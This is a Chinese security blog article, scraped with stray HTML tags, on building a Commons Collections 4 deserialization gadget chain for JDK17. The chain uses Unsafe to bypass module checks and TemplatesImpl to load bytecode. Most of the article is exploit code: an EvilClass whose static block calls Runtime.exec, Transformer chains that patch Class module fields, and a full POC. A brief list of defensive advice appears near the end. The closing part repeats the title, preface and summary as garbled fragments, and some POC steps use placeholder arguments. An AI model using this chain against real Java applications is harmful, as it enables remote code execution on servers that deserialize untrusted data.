JDK17下利用TemplatesImpl绕过模块检测的CC链构造分析<\/h1>

0x01 前言<\/h2>
本文详细分析在JDK17环境下如何绕过模块化限制，利用TemplatesImpl作为反序列化sink点构造完整的CC4攻击链。JDK17通过强封装(模块化)增强了安全性，但通过Unsafe等技术仍可实现利用。<\/p>

0x02 环境准备<\/h2>

JDK版本：17.0.8<\/li>
依赖链：Commons Collections 4 (CC4)<\/li>

关键技术点：

Unsafe修改模块关系<\/li>
TemplatesImpl字节码加载<\/li>

模块检测绕过技术<\/li> <\/ul> <\/li> <\/ul>

0x03 JDK17模块化检测机制<\/h2>

JDK9开始引入模块化，JDK17严格执行模块检测：<\/p>

反射和对象实例化时会检查调用类与被调用类的模块关系<\/li>

模块检测包括：

模块可见性检查<\/li>
导出包检查<\/li>

访问权限验证<\/li> <\/ul> <\/li> <\/ol>

0x04 初步验证<\/h2>

通过Unsafe修改调用类模块可以绕过部分检测：<\/p>

\/\/ 修改模块关系的核心方法
<\/span><\/span><\/span><\/span>void<\/span> patchModule<\/span>(<\/span>Class<?><\/span> currentClass,<\/span> Class<?><\/span> targetClass)<\/span> {<\/span>
<\/span><\/span>    \/\/ 获取Unsafe实例
<\/span><\/span><\/span><\/span>    Field unsafeField =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>    unsafeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> unsafeField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取目标模块
<\/span><\/span><\/span><\/span>    Object targetModule =<\/span> targetClass.<\/span>getModule<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 修改当前类的模块
<\/span><\/span><\/span><\/span>    long<\/span> moduleOffset =<\/span> unsafe.<\/span>objectFieldOffset<\/span>(<\/span>Class.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"module"<\/span>));<\/span>
<\/span><\/span>    unsafe.<\/span>getAndSetObject<\/span>(<\/span>currentClass,<\/span> moduleOffset,<\/span> targetModule);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x05 恶意类构造<\/h2>
1. 恶意字节码类<\/h3>
public<\/span> class<\/span> EvilClass<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 执行任意代码
<\/span><\/span><\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p>

不需要继承AbstractTranslet<\/code>以避免模块检测问题<\/li>
静态代码块作为触发点<\/li>
<\/ul>
2. TemplatesImpl利用要点<\/h3>
解决defineTransletClasses()<\/code>中的问题：<\/p>
\/\/ 需要设置_auxClasses避免NPE
<\/span><\/span><\/span><\/span>if<\/span> (<\/span>_class[<\/span>i].<\/span>getSuperclass<\/span>()<\/span> ==<\/span> ABSTRACT_TRANSLET)<\/span> {<\/span>
<\/span><\/span>    _transletIndex =<\/span> i;<\/span>
<\/span><\/span>}<\/span> else<\/span> {<\/span>
<\/span><\/span>    _auxClasses.<\/span>put<\/span>(<\/span>_class[<\/span>i].<\/span>getName<\/span>(),<\/span> _class[<\/span>i]);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>解决方案：<\/p>

设置_bytecodes.length > 1<\/code>让_auxClasses<\/code>自动初始化<\/li>
<\/ul>
0x06 关键问题解决<\/h2>
1. TrAXFilter.newInstance的模块检测<\/h3>
TrAXFilter<\/code>实例化时会进行严格模块检测：<\/p>
\/\/ 反射调用时的检测逻辑
<\/span><\/span><\/span><\/span>if<\/span> (!<\/span>Modifier.<\/span>isPublic<\/span>(<\/span>getModifiers()))<\/span> {<\/span>
<\/span><\/span>    \/\/ 模块检测
<\/span><\/span><\/span><\/span>    if<\/span> (!<\/span>callerModule.<\/span>canRead<\/span>(<\/span>module))<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> IllegalAccessError();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. Unsafe对象获取的链式构造<\/h3>
通过CC链构造获取Unsafe对象的流程：<\/p>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>    \/\/ 获取Unsafe.class
<\/span><\/span><\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Unsafe.<\/span>class<\/span>),<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取theUnsafe字段
<\/span><\/span><\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getDeclaredField"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"theUnsafe"<\/span>}),<\/span>
<\/span><\/span>        
<\/span><\/span>    \/\/ 设置字段可访问
<\/span><\/span><\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"setAccessible"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>boolean<\/span>.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>true<\/span>}),<\/span>
<\/span><\/span>        
<\/span><\/span>    \/\/ 获取Unsafe实例
<\/span><\/span><\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"get"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>}),<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>3. 模块检测绕过技术<\/h3>
方法一：修改packageName<\/h4>
\/\/ 修改被调用类的packageName为导出包
<\/span><\/span><\/span><\/span>long<\/span> pkgNameOffset =<\/span> unsafe.<\/span>objectFieldOffset<\/span>(<\/span>Class.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"packageName"<\/span>));<\/span>
<\/span><\/span>unsafe.<\/span>getAndSetObject<\/span>(<\/span>targetClass,<\/span> pkgNameOffset,<\/span> "java.lang"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>方法二：设置模块为null<\/h4>
\/\/ 将调用类和被调用类的模块都设为null
<\/span><\/span><\/span><\/span>unsafe.<\/span>getAndSetObject<\/span>(<\/span>callerClass,<\/span> moduleOffset,<\/span> null<\/span>);<\/span>
<\/span><\/span>unsafe.<\/span>getAndSetObject<\/span>(<\/span>targetClass,<\/span> moduleOffset,<\/span> null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>0x07 完整POC构造<\/h2>
\/\/ 1. 构造恶意字节码
<\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> evilCode =<\/span> generateEvilBytecode();<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> bytecodes =<\/span> new<\/span> byte<\/span>[][]{<\/span>evilCode,<\/span> new<\/span> byte<\/span>[<\/span>0<\/span>]};<\/span> \/\/ 确保length>1
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 2. 初始化TemplatesImpl
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> bytecodes);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Pwnr"<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 构造Unsafe获取链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> unsafeChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Unsafe.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getDeclaredField"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"theUnsafe"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"setAccessible"<\/span>,<\/span> new<\/span> Class[]{<\/span>boolean<\/span>.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>true<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"get"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 4. 构造模块修改链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> modulePatchChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Class.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getDeclaredField"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"module"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"setAccessible"<\/span>,<\/span> new<\/span> Class[]{<\/span>boolean<\/span>.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>true<\/span>}),<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>null<\/span>),<\/span> \/\/ 设置为null
<\/span><\/span><\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"set"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>})<\/span> \/\/ 参数占位
<\/span><\/span><\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 5. 构造最终调用链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> finalChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>new<\/span> Object[]{<\/span>templates}})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 6. 组合所有Transformer
<\/span><\/span><\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>
<\/span><\/span>    ArrayUtils.<\/span>addAll<\/span>(<\/span>unsafeChain,<\/span> modulePatchChain,<\/span> finalChain));<\/span>
<\/span><\/span><\/code><\/pre>0x08 调用链分析<\/h2>
完整调用流程：<\/p>

通过Unsafe链获取Unsafe实例<\/li>
修改调用类和被调用类的模块关系

要么设置为null<\/li>
要么修改packageName为已导出包<\/li>
<\/ul>
<\/li>
触发TemplatesImpl的getOutputProperties()<\/li>
加载并执行恶意字节码<\/li>
<\/ol>
0x09 防御建议<\/h2>

升级到最新JDK版本<\/li>
禁用或限制Unsafe使用<\/li>
实施严格的反序列化过滤<\/li>
使用SecurityManager限制敏感操作<\/li>
<\/ol>
0x10 总结<\/h2>
尽管JDK17加强了模块化安全，但通过：<\/p>

Unsafe修改模块关系<\/li>
巧妙构造Transformer链<\/li>
绕过package检测

仍可实现TemplatesImpl的利用。这提醒我们安全防护需要多层次、多维度的防御策略。<\/li>
<\/ol>

JDK17下利用TemplatesImpl绕过模块检测的CC链构造分析<\/h1>

0x01 前言<\/h2> 本文详细分析在JDK17环境下如何绕过模块化限制，利用TemplatesImpl作为反序列化sink点构造完整的CC4攻击链。JDK17通过强封装(模块化)增强了安全性，但通过Unsafe等技术仍可实现利用。<\/p>

0x05 恶意类构造<\/h2>

0x06 关键问题解决<\/h2>

3. 模块检测绕过技术<\/h3>

0x10 总结<\/h2> 尽管JDK17加强了模块化安全，但通过：<\/p> Unsafe修改模块关系<\/li> 巧妙构造Transformer链<\/li> 绕过package检测 仍可实现TemplatesImpl的利用。这提醒我们安全防护需要多层次、多维度的防御策略。<\/li> <\/ol>

0x01 前言<\/h2>
本文详细分析在JDK17环境下如何绕过模块化限制，利用TemplatesImpl作为反序列化sink点构造完整的CC4攻击链。JDK17通过强封装(模块化)增强了安全性，但通过Unsafe等技术仍可实现利用。<\/p>

0x10 总结<\/h2>
尽管JDK17加强了模块化安全，但通过：<\/p>

Unsafe修改模块关系<\/li>
巧妙构造Transformer链<\/li>
绕过package检测
仍可实现TemplatesImpl的利用。这提醒我们安全防护需要多层次、多维度的防御策略。<\/li> <\/ol>